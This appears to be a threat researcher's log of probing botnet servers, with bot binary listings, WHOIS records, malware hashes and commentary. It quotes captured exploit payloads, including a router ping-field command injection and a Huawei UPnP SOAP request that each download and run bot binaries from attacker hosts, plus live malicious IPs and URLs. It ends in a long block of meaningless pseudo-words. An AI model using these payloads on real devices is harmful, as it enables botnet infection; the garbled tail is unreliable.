<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="onion002.arm">onion002.arm</a> </td><td align="right">2022-04-06 01:30 </td><td align="right"> 24K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="onion002.arm5">onion002.arm5</a> </td><td align="right">2022-04-06 01:30 </td><td align="right"> 22K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="onion002.arm6">onion002.arm6</a> </td><td align="right">2022-04-06 01:30 </td><td align="right"> 29K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="onion002.arm7">onion002.arm7</a> </td><td align="right">2022-04-06 01:30 </td><td align="right"> 48K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="onion002.m68k">onion002.m68k</a> </td><td align="right">2022-04-06 01:30 </td><td align="right"> 52K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="onion002.mips">onion002.mips</a> </td><td align="right">2022-04-06 01:30 </td><td align="right"> 26K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="onion002.mpsl">onion002.mpsl</a> </td><td align="right">2022-04-06 01:30 </td><td align="right"> 27K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="onion002.ppc">onion002.ppc</a> </td><td align="right">2022-04-06 01:30 </td><td align="right"> 23K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="onion002.sh4">onion002.sh4</a> </td><td align="right">2022-04-06 01:30 </td><td align="right"> 50K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="onion002.spc">onion002.spc</a> </td><td align="right">2022-04-06 01:30 </td><td align="right"> 59K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="onion002.x86">onion002.x86</a> </td><td align="right">2022-04-06 01:30 </td><td align="right"> 24K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
</body></html>
$ curl -i 107.174.137.24
HTTP/1.1 403 Forbidden
Date: Sat, 09 Apr 2022 08:49:48 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
NetRange: 107.172.0.0 - 107.175.255.255
CIDR: 107.172.0.0/14
NetName: CC-17
NetHandle: NET-107-172-0-0-1
Parent: NET107 (NET-107-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS36352
Organization: ColoCrossing (VGS-9)
RegDate: 2013-12-27
Updated: 2013-12-27
Ref: https://rdap.arin.net/registry/ip/107.172.0.0
OrgName: ColoCrossing
OrgId: VGS-9
Address: 325 Delaware Avenue
Address: Suite 300
City: Buffalo
StateProv: NY
PostalCode: 14202
Country: US
RegDate: 2005-06-20
Updated: 2019-10-17
Ref: https://rdap.arin.net/registry/entity/VGS-9
% No abuse contact registered for 51.81.0.0 - 51.81.255.255
inetnum: 51.81.0.0 - 51.81.255.255
netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
descr: IPv4 address block not managed by the RIPE NCC
remarks: ------------------------------------------------------
remarks:
remarks: For registration information,
remarks: you can consult the following sources:
remarks:
remarks: IANA
remarks: http://www.iana.org/assignments/ipv4-address-space
remarks: http://www.iana.org/assignments/iana-ipv4-special-registry
remarks: http://www.iana.org/assignments/ipv4-recovered-address-space
remarks:
remarks: AFRINIC (Africa)
remarks: http://www.afrinic.net/ whois.afrinic.net
remarks:
remarks: APNIC (Asia Pacific)
remarks: http://www.apnic.net/ whois.apnic.net
remarks:
remarks: ARIN (Northern America)
remarks: http://www.arin.net/ whois.arin.net
remarks:
remarks: LACNIC (Latin America and the Carribean)
remarks: http://www.lacnic.net/ whois.lacnic.net
remarks:
remarks: ------------------------------------------------------
country: EU # Country is really world wide
admin-c: IANA1-RIPE
tech-c: IANA1-RIPE
status: ALLOCATED UNSPECIFIED
mnt-by: RIPE-NCC-HM-MNT
created: 2019-03-11T16:33:15Z
last-modified: 2019-03-11T16:33:15Z
source: RIPE
$ curl -i http://51.81.133.91/
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2022 04:04:33 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 12 Apr 2022 03:23:12 GMT
ETag: "13-5dc6c94b3bfe0"
Accept-Ranges: bytes
Content-Length: 19
Content-Type: text/html; charset=UTF-8
MTM v2.6 Was here.
$ curl -i http://51.81.133.91/FKKK/
HTTP/1.1 200 OK
Date: Fri, 22 Apr 2022 04:03:39 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 12 Apr 2022 03:23:12 GMT
ETag: "4-5dc6c94b3bfe0"
Accept-Ranges: bytes
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Hey
$ curl -i stresser.pw
HTTP/1.1 301 Moved Permanently
Date: Fri, 22 Apr 2022 04:22:04 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Fri, 22 Apr 2022 05:22:04 GMT
Location: https://cryptostresser.com
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=egX7%2FmZbvSA5f2fWJV6HNhnKrExpq9%2FCmooO%2BRh%2Fg7X3ob47VGICKg1WiLzyr8I21XGICczFb3asyHsCBq%2BCc7Bp8PmUFmUHOqoZavSiezgUVCZEjfaGnQ1wzki6dQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6ffb93886f537762-LHR
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
https://documents.trendmicro.com/assets/pdf/APPENDIX_Back-to-Back%20Campaigns.pdf
inetnum: 163.179.0.0 - 163.179.255.255
netname: UNICOM-GD
descr: China Unicom Guangdong province network
descr: China Unicom
country: CN
admin-c: CH1302-AP
tech-c: RP181-AP
remarks: service provider
mnt-by: APNIC-HM
mnt-lower: MAINT-CNCGROUP-GD
mnt-routes: MAINT-CNCGROUP-RR
mnt-irt: IRT-CU-CN
status: ALLOCATED PORTABLE
remarks: --------------------------------------------------------
remarks: To report network abuse, please contact mnt-irt
remarks: For troubleshooting, please contact tech-c and admin-c
remarks: Report invalid contact via www.apnic.net/invalidcontact
remarks: --------------------------------------------------------
last-modified: 2016-05-04T00:30:26Z
source: APNIC
irt: IRT-CU-CN
address: No.21,Financial Street
address: Beijing,100033
address: P.R.China
e-mail: hqs-ipabuse@chinaunicom.cn
abuse-mailbox: hqs-ipabuse@chinaunicom.cn
admin-c: CH1302-AP
tech-c: CH1302-AP
auth: # Filtered
mnt-by: MAINT-CNCGROUP
last-modified: 2017-10-23T05:59:13Z
source: APNIC
person: ChinaUnicom Hostmaster
nic-hdl: CH1302-AP
e-mail: hqs-ipabuse@chinaunicom.cn
address: No.21,Jin-Rong Street
address: Beijing,100033
address: P.R.China
phone: +86-10-66259764
fax-no: +86-10-66259764
country: CN
mnt-by: MAINT-CNCGROUP
last-modified: 2017-08-17T06:13:16Z
source: APNIC
person: runkeng pan
nic-hdl: RP181-AP
e-mail: gdipnoc@chinaunicom.cn
address: XinShiKong Plaza,No 666 Huangpu Rd. Guangzhou 510627,China
phone: +86-20-22214174
fax-no: +86-20-22212266-4174
country: CN
mnt-by: MAINT-CNCGROUP-GD
last-modified: 2015-12-16T03:32:02Z
source: APNIC
$ curl -i http://163.179.162.206:38334/Mozi.m
HTTP/1.1 200 OK
Server: nginx
Content-Length: 108808
Connection: close
Content-Type: application/zip
From HTTP POST:
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=$(busybox+wget+http://23.95.186.164/cache+-O+->+/dev/.p;sh+/dev/.p)&ipv=0
NetRange: 23.94.0.0 - 23.95.255.255
CIDR: 23.94.0.0/15
NetName: CC-16
NetHandle: NET-23-94-0-0-1
Parent: NET23 (NET-23-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS36352
Organization: ColoCrossing (VGS-9)
RegDate: 2013-08-16
Updated: 2013-08-16
Ref: https://rdap.arin.net/registry/ip/23.94.0.0
OrgName: ColoCrossing
OrgId: VGS-9
Address: 325 Delaware Avenue
Address: Suite 300
City: Buffalo
StateProv: NY
PostalCode: 14202
Country: US
RegDate: 2005-06-20
Updated: 2019-10-17
Ref: https://rdap.arin.net/registry/entity/VGS-9
$ curl -i http://23.95.186.164
HTTP/1.1 403 Forbidden
Date: Tue, 26 Apr 2022 21:36:50 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Apache HTTP Server Test Page powered by CentOS</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
NetRange: 107.172.0.0 - 107.175.255.255
CIDR: 107.172.0.0/14
NetName: CC-17
NetHandle: NET-107-172-0-0-1
Parent: NET107 (NET-107-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS36352
Organization: ColoCrossing (VGS-9)
RegDate: 2013-12-27
Updated: 2013-12-27
Ref: https://rdap.arin.net/registry/ip/107.172.0.0
OrgName: ColoCrossing
OrgId: VGS-9
Address: 325 Delaware Avenue
Address: Suite 300
City: Buffalo
StateProv: NY
PostalCode: 14202
Country: US
RegDate: 2005-06-20
Updated: 2019-10-17
Ref: https://rdap.arin.net/registry/entity/VGS-9
$ curl -i 107.175.215.224
HTTP/1.1 403 Forbidden
Date: Wed, 04 May 2022 01:07:51 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8
keikaku doori!
inetnum: 61.177.137.128 - 61.177.137.135
netname: wuxi-Freshwater-Fisheries-Center
descr: wuxi Freshwater Fisheries Research Center
descr: Wuxi City
descr: Jiangsu Province
country: CN
admin-c: CH456-AP
tech-c: CH456-AP
status: ASSIGNED NON-PORTABLE
mnt-by: MAINT-CHINANET-JS
mnt-lower: MAINT-CHINANET-JS-WX
last-modified: 2010-07-22T01:52:02Z
source: APNIC
person: CHINANET-JS-WX Hostmaster
address: No.3,Jiankang Road,Wuxi 214001
country: CN
phone: +86-510-2730813
fax-no: +86-510-2700519
e-mail: jsipmanager@163.com
nic-hdl: CH456-AP
remarks: send anti-spam or abuse reports to jsipmanager@163.com
remarks: times in GMT+8
mnt-by: MAINT-CHINANET-JS-WX
last-modified: 2022-03-15T07:12:25Z
source: APNIC
$ curl -i http://61.177.137.133/x/
HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 961
Date: Wed, 04 May 2022 02:34:58 GMT
<html><head><title>Apache Tomcat/7.0.26 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /x/</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/x/</u></p><p><b>description</b> <u>The requested resource (/x/) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/7.0.26</h3></body></html>
inetnum: 213.232.235.128 - 213.232.235.255
org: ORG-AS895-RIPE
netname: AlexHost
country: MD
admin-c: SZ3268-RIPE
tech-c: SZ3268-RIPE
status: ASSIGNED PA
mnt-by: IPSMAIN
created: 2021-10-07T15:25:09Z
last-modified: 2021-10-07T15:25:09Z
source: RIPE
mnt-domains: CLOUDATAMD-MNT
mnt-lower: CLOUDATAMD-MNT
mnt-routes: CLOUDATAMD-MNT
organisation: ORG-AS895-RIPE
org-name: ALEXHOST SRL
org-type: OTHER
address: str. C. Brancusi nr. 3, Chisinau, Moldova
abuse-c: AR18916-RIPE
mnt-ref: MNT-GLBTX
mnt-ref: FREENET-MNT
mnt-ref: IPSMAIN
mnt-by: IPSMAIN
created: 2021-02-08T19:58:24Z
last-modified: 2022-03-09T16:27:19Z
source: RIPE # Filtered
$ curl -i http://213.232.235.203/
HTTP/1.1 403 Forbidden
Date: Thu, 05 May 2022 18:20:52 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
Content-Length: 202
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /
on this server.</p>
</body></html>
Original sinkholed link:
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Variant link:
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
Mostly just Chinese porn. Strange way of bypassing detections I guess, but not sure what the point is. Only very obscure security researchers are ever going to see this link…
MD5 Hash: 0e4fd3b90dbfb706f38d70af3e28d752
SHA1 Hash: e5c2991a028bebe5c086836fa2d9f7769c3de189
SHA256 Hash: de106db86e26b873be1611b5b7fa2ec4113044bef7dfafb2a6f557fa752d8c3c
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
VirusTotal First Spotted: 2021-12-02 21:51:07 UTC
https://www.virustotal.com/gui/file/de106db86e26b873be1611b5b7fa2ec4113044bef7dfafb2a6f557fa752d8c3c
Strings from inside:
cisco
FFDDADADACACACACACACACACACABN
SMB%
\MAILSLOT\BROWSE
PDM000900-V7388
scaneo de VDI
pdm000900-v1763
mapfre
MSFT 5.0
'_discovery20081
prop.key.msg_type
#prop.val.rply.p2p.content_discovery
pdm000900-v1717<
MSFT 5.07
</head><body>
<h1>Not Found</h1>
<p>The requested URL /wpad.dat was not found on this server.</p>
<hr>
<address>Apache/2.2.15 (Oracle) Server at 10.231.177.21 Port 80</address>
</body></html>
0273740
name1
VirtualesPDM0
objectGUID1
objectCategory1
BCN=Organizational-Unit,CN=Schema,CN=Configuration,DC=mapfre,DC=net0
gPLink1
[LDAP://cn={68D681C2-6B9B-4751-B74A-A0CE85A62686},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0][LDAP://cn={F833F8E0-5756-4715-B2A4-A66A09951C53},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0][LDAP://cn={34C5D7E9-7B59-4F93-A24C-DDEB1AB0223A},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0][LDAP://cn={9C943BCF-0686-4064-B3FE-6F1593EBFF0A},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0][LDAP://cn={22A49EF3-1C54-41B8-BA4D-B1C25B8F869E},cn=policies,cn=system,DC=es,DC=mapfre,DC=net;0]0
As you can see, this is a very specific LDAP string. “es.mapfre.net”. Just typing “mapfre.net” redirects to “mapfre.com”, with default language Spanish, so it’s likely a directly targeted LDAP attack of some kind on them. I’m assuming this already swung around to their attention given they’ve moved entirely off the mapfre.net domain, but who knows what their internal LDAP structure is like (those are hard to migrate due to internal applications…). I’m sure whatever vulnerability this exploits has been addressed, though.
The 404 embedded 10.231.177.21 response makes me think it poses as an HTTP server. This attack has quite a large quantity of knowledge about the internal structure of their enterprise architecture.
$ curl -i jx.qingdaosheng.com
HTTP/1.1 200 OK
Date: Tue, 10 May 2022 18:54:28 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Wed, 13 Apr 2022 12:35:57 GMT
ETag: "0-5dc886b50fe98"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
jx.qingdaosheng.com. 154 IN A 156.234.211.155
Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS
unstable_is_the_history_of_universe
GOLDFISHGANG
inetnum: 2.56.56.0 - 2.56.57.255
netname: SERVER-2-56-56-0
country: NL
org: ORG-SB666-RIPE
admin-c: SBAH21-RIPE
tech-c: SBAH21-RIPE
status: ASSIGNED PA
mnt-by: PREFIXBROKER-MNT
created: 2021-05-03T18:09:59Z
last-modified: 2021-05-03T18:09:59Z
source: RIPE
organisation: ORG-SB666-RIPE
org-name: Serverion BV
org-type: OTHER
address: Krammer 8
address: 3232HE Brielle
address: Netherlands
abuse-c: SBAH21-RIPE
mnt-ref: PREFIXBROKER-MNT
mnt-by: PREFIXBROKER-MNT
created: 2021-05-03T18:09:58Z
last-modified: 2021-05-03T18:09:58Z
source: RIPE # Filtered
v1.kannimanelaji.com. 600 IN A 156.226.173.28
$ curl -i v1.kannimanelaji.com
HTTP/1.1 200 OK
Date: Fri, 13 May 2022 06:08:03 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 10 May 2022 15:22:55 GMT
ETag: "0-5dea9e625c6c5"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
inetnum: 156.226.173.0 - 156.226.173.255
netname: ICIDC_Limited
descr: ICIDC Limited
country: HK
admin-c: CIS1-AFRINIC
tech-c: CIS1-AFRINIC
status: ASSIGNED PA
mnt-by: CIL1-MNT
source: AFRINIC # Filtered
parent: 156.224.0.0 - 156.255.255.255
person: Cloud Innovation Support
address: Ebene
address: MU
address: Mahe
address: Seychelles
phone: tel:+248-4-610-795
nic-hdl: CIS1-AFRINIC
abuse-mailbox: abuse@cloudinnovation.org
mnt-by: CIL1-MNT
source: AFRINIC # Filtered
$ curl -i http://156.226.173.28
HTTP/1.1 200 OK
Date: Fri, 13 May 2022 06:06:35 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Tue, 10 May 2022 15:22:55 GMT
ETag: "0-5dea9e625c6c5"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
lzrd cock fest"/proc/"/exe
$ curl -i http://104.168.46.103/
HTTP/1.1 200 OK
Date: Fri, 13 May 2022 22:06:42 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 12 May 2022 19:38:40 GMT
ETag: "eb-5ded5b479d753"
Accept-Ranges: bytes
Content-Length: 235
Content-Type: text/html; charset=UTF-8
<html>
<body>
<title>EAT MY BINS :)</title>
<p><img src="bins.jpg"
width = "1000"
height = "500" </p>
<audio src="meme1.mp3" controls autoplay />
<body style="background-color:green">
</html>
</body>
</html>
Image is here:
EXIF Data:
EXIF tags in 'bins.jpg' ('Intel' byte order):
--------------------+----------------------------------------------------------
Tag |Value
--------------------+----------------------------------------------------------
Manufacturer |Canon
Model |Canon EOS DIGITAL REBEL XS
Orientation |Top-left
X-Resolution |72
Y-Resolution |72
Resolution Unit |Inch
Date and Time |2011:03:08 14:36:11
YCbCr Positioning |Co-sited
Compression |JPEG compression
X-Resolution |72
Y-Resolution |72
Resolution Unit |Inch
Exposure Time |1/100 sec.
F-Number |f/8.0
Exposure Program |Not defined
ISO Speed Ratings |200
Exif Version |Exif Version 2.21
Date and Time (Origi|2011:03:05 16:18:30
Date and Time (Digit|2011:03:05 16:18:30
Components Configura|Y Cb Cr -
Shutter Speed |6.62 EV (1/99 sec.)
Aperture |6.00 EV (f/8.0)
Exposure Bias |0.00 EV
Metering Mode |Pattern
Flash |Flash did not fire, compulsory flash mode
Focal Length |55.0 mm
Maker Note |8028 bytes undefined data
User Comment |
Sub-second Time |88
Sub-second Time (Ori|88
Sub-second Time (Dig|88
FlashPixVersion |FlashPix Version 1.0
Color Space |sRGB
Pixel X Dimension |3888
Pixel Y Dimension |2592
Focal Plane X-Resolu|4438.356
Focal Plane Y-Resolu|4445.969
Focal Plane Resoluti|Inch
Custom Rendered |Normal process
Exposure Mode |Auto exposure
White Balance |Auto white balance
Scene Capture Type |Standard
Interoperability Ind|R98
Interoperability Ver|0100
--------------------+----------------------------------------------------------
EXIF data contains a thumbnail (7752 bytes).
Audio tags for “meme1.mp3”:
File tags:
Artist: Soulja Boy Tell'em
Album: Crank That (Soulja Boy) [Travis Barker Remix]
Comment: http://www.youtube.com/watch?v=kMBxzoXdKjc
Date: 2021
Description: Disclaimer:
Dear artists, producers and photographers!
The purpose of Taz Lyricsis to share fantastic music and beautiful pictures! If you are the rightful owner of any material posted by us and want us to remove it, we will do so immediately. Just send me an message/email please!
rbstyles8@gmail.com
Title: Crank That (Soulja Boy) [Travis Barker Remix]
Seems to be the full audio stream from the audio with the cover art as follows:
$ ffmpeg -i meme1.mp3 -map 0:v meme1.png
Index of /bins
[ICO] Name Last modified Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory -
[ ] arm 2022-05-12 15:55 31K
[ ] arm5 2022-05-12 15:55 31K
[ ] arm6 2022-05-12 15:55 35K
[ ] arm7 2022-05-12 15:55 55K
[ ] m68k 2022-05-12 15:55 72K
[ ] mips 2022-05-12 15:55 32K
[ ] mpsl 2022-05-12 15:55 33K
[ ] ppc 2022-05-12 15:55 30K
[ ] sh4 2022-05-12 15:55 69K
[ ] spc 2022-05-12 15:55 60K
[ ] x86 2022-05-12 15:55 31K
══════════════════════════════════════════════════════════════
At least a creative set of bins splash page, I’m all for it.
All the binaries are UPX packed. After unpacking seemed like standard Zeus Huawei attacks:
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soa
p/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection
:1"><NewStatusURL>$(/bin/busybox wget -g 104.168.46.103 -l /tmp/.Zeus -r
/bins/mips; /bin/busybox chmod 777 * /tmp/.Zeus; /tmp/.Zeus Zeus.huawei)<
/NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgr
ade></s:Body></s:Envelope>
inetnum: 185.199.224.128 - 185.199.224.255
netname: H131
country: US
admin-c: FDL300-RIPE
tech-c: FDL300-RIPE
status: ASSIGNED PA
created: 2017-07-17T05:34:36Z
last-modified: 2021-10-14T12:10:24Z
source: RIPE
mnt-by: mnt-ca-heymman15-1
descr: LEE YONG
person: Heymman Servers Corporation
address: 800 Steeles Ave W, # B10182
address: Thornhill, Ontario L4J 7L2
address: Canada
phone: +1 438-495-6967
nic-hdl: FDL300-RIPE
mnt-by: mnt-ca-heymman9-1
created: 2018-11-02T15:20:22Z
last-modified: 2020-04-13T14:45:19Z
source: RIPE
$ curl -i http://185.199.224.210:7845/
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 4156
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.342033254215494; path=/; HttpOnly
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1
Messages
User
Login
Folder
[IMG] Home
0 folders, 1 files, 589.2 KBytes
Search
________________ [ go ]
Where to search (X) this folder and sub-folders
( ) this folder only
( ) entire server
Select
All Invert Mask
0 items selected
Actions
Archive Get list
Server information HttpFileServer 2.3m
Server time: 2022-5-16 4:14:05
Server uptime: (4 days) 04:22:35
Name.extension Size Timestamp Hits
[ ] [IMG] s.exe 589.2 KB 2022-1-24 20:59:25 3152
Helacilebaga pujob tazonameg gapusipizur zako. Yanoveyos zelevovivavoy abc lihuc. Taseto. Kide pilu poxabagetoxol mof hijajoxosa. Vavo. Yuj vihuzovubebek gipor civaducam fuk. Havefuwobepuhe lezobigefuge yadetivoruzop neluhijowu. Cusec. Jejitah luyizu lanakonovoho. Kilupa. Yapenorebadu zoral zocojano xukosajaxavod. Rohebitifab zibohay wibuv. Goyozatuw husiwilivuf soyotuk. Goxatepaka sayudo. Kupiz. Xifa hojogotane vasudecolimahoj bupo wapuzazipedot. Jodovuposa tegixihucitoru memavaxol misahepupuxuxo tinofim. Yuzucoyovuye. Dapaxufiloh. Pugiketodusuhu rimefikuloc. Xazaxukav pumipiyowahegol pidokizunucibap wuyobebena dav. Kaxigemuh. Soyo duniguvi poj wofixocuyomac. Xowigecohox ticukasukepi bedekecuxocera fusebefuxorova. Poyinavukogu pul zitesi. Pedirilon linidakona dopakipuxajulud. Jokuwujehed. Mik duzewer kixizaven. Johu sorucerul zaduhegor gupilojujagavaf. Gotafaxuwe. Nolemaduwivi pepitosawehu nuxusuyimuze. Zuca kuyekufe xafasuzota dositakusa bivocitut. Kawoz. Fuhogovanu bekisob. Mosolopumofab roduwap zumuhujuvujoc cobiyaj lonahasecohif. Konabejuve juwupogufe ziyuwitasup nezegabahab. Camiyabowese mixeyahi weho zixumogorene jocojosi. Fewayubupinojic diwaxada turi catol. Xalumocavef puzobeberamu yugulaso wux. Cagax. Cilomiba kulamuxibowu jababuhoki bixemogapopibe. Komaga manitaji. Fesiguw casupetiwecej derufixah bewelijore sibav. Liloludipex cojuhucewawidur domifapanaja fesifana. Veg gejowuliho. Hubebomupir. Xiwe zedivize nohupet suwepapukomer gicoyafep. Gefujewesah tibiwalotuc cifuvecuy jeziwoh. Nox. Kufoyikokufunum. Yumezugoroke cegugolomumiraw xel sutapocosip rucuxubiwonara. Supoyulimawofuw. Pinusoyoziso. Voraya pijoko nuxonay payesarome bulig. Dej. Dusanubezi rofaboruwawumoy tituv goluxabezalu. Yiriwi refader cowuxupujufa. Vus jazobavax yuxo vef. Duhoda cudipiwiho libofasokajosof. Wuletenowujuju meyepamarapumez. Lebes veca pupi. Ganaxayetororas beruyehamafenor vayagu raper roh. Redecag juzilovexumon suvi josixekuti. Mireyihap pusinikoheran. Siha cotoge. Turug neyeyerosomod ferizajarur yokufudisefeguv. Zavukesacoz muka. Cuworini yal wolukogepig. Tif terasocebup fumamiru kobarutelu hujaduxu. Bidafosihew. Saciganugugek tajetasapopu xosi jiwu woxetonocejix. Fixub tipumudewejir rayigomayux yajogusonag cidadukixo. Yedecoyus maxokivides sipovofowafuro. Fitocixuhes dukodug gilosefisusiro. Jayizejoho wuwo sehexiwalasap. Diyex vinilapag pomuda vufayomu. Pubigayemahiba tekovi jaw vimiju pet. Xuhazoxes ditocirudodore zibihocuhuj hojowupu yufabok. Locejijicu tifosebiyenogo pironune. Vecacutagokuwob. Welanuger jafehivug lezetijetuj jisuzuk jehumufe. Votofanoyilinuv. Mepajopihokec. Vaxiwocuto. Nutozewawiyihec bobip xil lehomasiraj. Folerisagecifer. Najicicihohay yekuzelusikom timey mavesizebituki. Mupohoyi dixaxoguku fota sotafek. Tuvoguwa luponu robosaxof duzupu vakakacaji. Nimogas mub. Ruxo roriyotep mudalacugil macepus. Xijisedepa jocic rada zifaw. Paveh vifilawayecoz wuwun zuvuzumo wej. Popiduju gocopuxat wik. Ziseyahiwaz divatusoxut. Jewalas. Vufovaxevu tazovuragojih. Yemodesesahewe. Nomedipito guxeme kuwoboyutigabij tesi pepazagavo. Dayowi yeya yig sebugijamahixo. Gaj reyazakes hoz mijopime jutiharegihu. Vizusogeca jixulom. Cuva yewinexiwixaw zefolijuweg. Heciv cenavuzadegifew kipexelunosi halupat. Cocayadacufanu guhanude tipekufiz suyodefitan. Genup zirorixaha lobituwixiyaha gotus. Gimuta. Sale tajohapefom. Derawad. Vebo mad. Juzul romazezegam cigehujuz. Vozohafij. Yunuwovahu kuxebux weyis manuwomaheno. Gecozuhohof tukicebey. Wokukemesazexic nekukegi vubacujagupu gamovarocez. Kidimetubeb lego zukibikep yobomivekobohaf. Ziyumepiweh wimo bidesakazi. Puwoworazi. Kojekidej doyezed mimuciruface gotoyasumulu. Nuh. Lisavaturub moyewukakusebag kitohuzuw. Bemoherixabemu pabeha makodiworita. Dahagusete sifimisoji gucebefofep ditubodu. Domi mofohucoye lub jetemaniwo temitoz. Pihigor siralahobudaf. Jem. Sobajogi duhojovoxih jinebese. Mikawu cifubab. Gavi xad vidojukakagupim beme tatanivaxu. Fudavusobowe sexuvus. Xalewiloy koti jeyumetejodubo bifibulosa. Nacesobu jase tazolonevipovos kona xokahayorokuti. Kirejifu jabaweziwisi viyajirogoruta. Lehix rifoduzesuge. Lavoborosu mut. Kuva dahahovavihe bowe. Jujizixifalun lot pahos rovuwemovavoc. Mej zesopiliho zosigux gunohexet yocaxinef. Fat wuxigovi sohix. Mec wicobizerutub veroga pedosu. Fuyef gagahajafowe cagojavavo bicogabaf yilunemenidenuk. Lafuzogayu keher fijagoxuzih nahutuxucalihed. Pojehuh tajasal jukigucopukaled yuh. Vicovoneboxisu. Nipigeto. Yajowob numa mivacuc zutoletoxefa. Todoxu dusojej mitofiguy tomolihujegor. Gutusulidebaju jiyuwu. Wufe lawep. Pimokudufitosi guzixisexuj depij rus katuxalazoz. Yimafapuwecetip hib. Wujikolivobaz. 